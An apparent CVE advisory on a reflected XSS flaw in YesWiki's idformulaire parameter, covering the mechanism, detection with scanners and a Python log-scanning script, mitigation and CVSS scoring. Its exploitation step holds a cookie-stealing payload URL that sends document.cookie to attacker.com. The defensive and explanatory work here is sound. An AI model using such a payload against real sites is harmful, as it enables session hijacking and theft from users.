How the CVE Works
This vulnerability in YesWiki (< v4.5.4) is a reflected cross-site scripting (XSS) flaw in the `idformulaire` parameter of the `/BazaR` endpoint. The application reflects the user-supplied value into the response without validating it or encoding it for the HTML context, so an attacker can inject arbitrary HTML and JavaScript. When a victim visits a crafted URL (e.g., https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>alert(1)</script>), the server returns the payload in the page and it executes in the victim's browser, in the origin of the wiki. Because the injection is reflected server-side (not DOM-based), the unencoded value can be confirmed directly in the raw HTTP response. Consequences include theft of session cookies that lack the `HttpOnly` flag and actions performed in the wiki with the victim's privileges.
DailyCVE Form
Platform: YesWiki
Version: <4.5.4
Vulnerability: XSS
Severity: Medium
Date: 2023-XX-XX
What Undercode Say:
Exploitation:
1. Craft a malicious URL (shown decoded here; in practice percent-encode the payload so it survives the victim's browser and any mail client):
https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
2. Social-engineer the victim into clicking the link while logged in; the script runs in the wiki's origin and exfiltrates `document.cookie` (only cookies without the `HttpOnly` flag are readable from script).
Detection:
- Use automated scanners (e.g., Burp Suite, ZAP, or XSStrike) and include the parameters that reach the affected view, not just `idformulaire`:
python3 xsstrike.py -u "https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=test"
- Manual testing: send a harmless probe and check whether it comes back unencoded in the response body. Grep for the literal probe rather than any `<script>` tag, since the page's own scripts would otherwise produce a false positive:
curl -s "https://yeswiki.net/?BazaR&vue=formulaire&action=confirm_delete&idformulaire=%3Cscript%3Econfirm(1)%3C/script%3E" | grep "<script>confirm(1)</script>"
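The two detection approaches above can be scripted. The block below is an added example, not code from the YesWiki project or the original advisory: it builds a correctly percent-encoded probe URL, classifies a response body as reflecting the probe unencoded (vulnerable), HTML-encoded (patched) or not at all, and scans web-server access log lines for exploitation attempts against `idformulaire`, including double-encoded payloads. The host `yeswiki.example`, the response bodies and the log lines are constructed for the example; the parameter names come from the advisory.

```python
import re
import urllib.parse
from html import escape

# Constructed target (hypothetical host); the query parameters are those from the advisory.
BASE = "https://yeswiki.example/?BazaR&vue=formulaire&action=confirm_delete"
MARKER = "xsschk7f3a"                  # unique token so we match our probe, not page content
PROBE = f"<script>{MARKER}</script>"   # harmless: the marker is not valid JavaScript that does anything


def probe_url(base: str, probe: str = PROBE) -> str:
    """Append an idformulaire probe, percent-encoded so the server (not the client) decodes it."""
    return f"{base}&idformulaire={urllib.parse.quote(probe, safe='')}"


def classify_reflection(body: str, probe: str = PROBE) -> str:
    """'unencoded' if the raw probe is in the body (exploitable),
    'encoded' if only the HTML-escaped form is present (output encoding in place),
    'absent' if the value is not reflected at all."""
    if probe in body:
        return "unencoded"
    if escape(probe, quote=True) in body or escape(probe, quote=False) in body:
        return "encoded"
    return "absent"


# Constructed responses standing in for a vulnerable and a patched server.
VULNERABLE_BODY = f"<h2>Confirm deletion</h2><p>Delete form {PROBE}?</p>"
PATCHED_BODY = f"<h2>Confirm deletion</h2><p>Delete form {escape(PROBE, quote=True)}?</p>"

# Script-like content in a parameter that should only ever hold a numeric form id.
ATTEMPT_RE = re.compile(r"<\s*script|on\w+\s*=|javascript:", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')


def find_attempts(log_lines):
    """Return (line_no, decoded idformulaire value) for requests whose idformulaire
    parameter looks like an XSS attempt. parse_qs decodes once; the extra unquote
    catches double-encoded payloads (%253C -> %3C -> <)."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m.group(1)).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        for value in params.get("idformulaire", []):
            decoded = urllib.parse.unquote(value)
            if ATTEMPT_RE.search(decoded):
                hits.append((n, decoded))
    return hits


# Constructed access-log sample (combined log format); IPs are documentation ranges.
LOG = [
    '203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /?BazaR&vue=formulaire&action=confirm_delete&idformulaire=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Mar/2024:10:00:07 +0000] "GET /?BazaR&vue=formulaire&action=confirm_delete&idformulaire=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5300',
    '198.51.100.2 - - [10/Mar/2024:10:01:15 +0000] "GET /?BazaR&vue=formulaire&action=confirm_delete&idformulaire=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 5300',
    '203.0.113.5 - - [10/Mar/2024:10:02:00 +0000] "GET /?PagePrincipale HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    print(probe_url(BASE))
    print("vulnerable:", classify_reflection(VULNERABLE_BODY))
    print("patched:   ", classify_reflection(PATCHED_BODY))
    for line_no, value in find_attempts(LOG):
        print(f"attempt on log line {line_no}: {value!r}")
```

To run the active check against a real instance, fetch `probe_url(BASE)` with an HTTP client and pass the response text to `classify_reflection`; a result of `unencoded` means the server reflects the value without HTML encoding, which is the condition this CVE depends on. The log scanner only inspects `idformulaire`, so it does not flag legitimate pages that happen to contain inline scripts.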
Mitigation:
1. Update to YesWiki ≥4.5.4.
2. Encode the value on output for the HTML context (the snippet below is output encoding, not input sanitization); since `idformulaire` is a form identifier, additionally reject any value that is not an integer before it reaches the template:
$idformulaire = htmlspecialchars($_GET['idformulaire'], ENT_QUOTES, 'UTF-8'); // HTML-context output encoding
3. Deploy a CSP that blocks injected inline script. A policy containing `'unsafe-inline'` in `script-src` offers no protection against this bug, because the injected `<script>` block is inline; use a policy such as:
Content-Security-Policy: default-src 'self'; script-src 'self'
Analytics:
- CVSS Breakdown (the vector typically assigned to reflected XSS, AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, which is consistent with the Medium rating above):
- Attack Vector (AV:N): exploitable over the network, with no privileges required (PR:N).
- User Interaction (UI:R): the victim must open the crafted link.
- Scope (S:C): the script executes in the victim's browser, outside the vulnerable server component.
- Impact (C:L/I:L): limited confidentiality loss (non-`HttpOnly` cookies, page content) and integrity loss (actions performed in the victim's session); no availability impact.
- Exploitability: low skill required; a single crafted URL suffices.
References:
Reported By: github.com